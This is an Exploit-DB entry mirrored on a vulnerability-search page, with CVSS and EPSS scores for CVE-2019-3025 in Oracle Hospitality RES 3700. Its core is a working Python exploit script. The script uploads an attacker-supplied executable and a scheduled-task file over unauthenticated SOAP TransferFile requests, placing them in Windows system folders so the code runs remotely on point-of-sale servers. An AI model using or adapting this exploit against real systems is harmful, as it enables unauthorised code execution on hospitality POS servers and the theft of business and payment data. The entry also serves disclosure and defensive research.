Lucene search

Walid FaourEDB-ID:48477

HistoryMay 18, 2020 - 12:00 a.m.

Oracle Hospitality RES 3700 5.7 - Remote Code Execution

2020-05-1800:00:00

Walid Faour

www.exploit-db.com

702

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.103

Percentile

95.1%

JSON

# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
# Date: 2019-10-01
# Exploit Author: Walid Faour
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
# Software Link: N/A (Available to customers)
# Version: <= v5.7
# Tested on: Windows Server 2003 / Windows Server 2008
# CVE : CVE-2019-3025

#!/usr/bin/env python

#Author: Walid Faour
#Date: Aug. 2, 2019
#Oracle Hospitality RES 3700 Release 4.9 Exploit

import binascii
import requests

print
print '-------------------------------------------------'
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
print '-------------------------------------------------'
print

IP = raw_input("Enter the IP address: ")
URL = "http://" + IP + ":50123"

f = open("attacker-4.9.exe",'rb')
raw_payload = f.read()
payload_hex = binascii.hexlify(raw_payload)
f.close()

g = open("attacker-4.9.job",'rb')
raw_task = g.read()
scheduled_task_hex = binascii.hexlify(raw_task)
g.close()

def exploit_body(data,full_path):
	body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
			<SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
				<MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
				<MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
				<MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
				<MCRS-ENV:InputParameters> \
					<dst>' + full_path + '</dst> \
					<fn>' + full_path + '</fn> \
					<data>' + data + '</data> \
				</MCRS-ENV:InputParameters> \
			</SOAP-ENV:Body> \
		</SOAP-ENV:Envelope>'
	return body
def exploit_headers(body):
	headers = {
		"Content-Type" : "text/xml",
		"User-Agent" : "MDS POS Client",
		"Host" : IP + ":50123",
		"Content-Length" : str(len(body)),
		"Connection" : "Keep-Alive"
	}
	return headers
print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'
body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")
send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.103

Percentile

95.1%

JSON

Related for EDB-ID:48477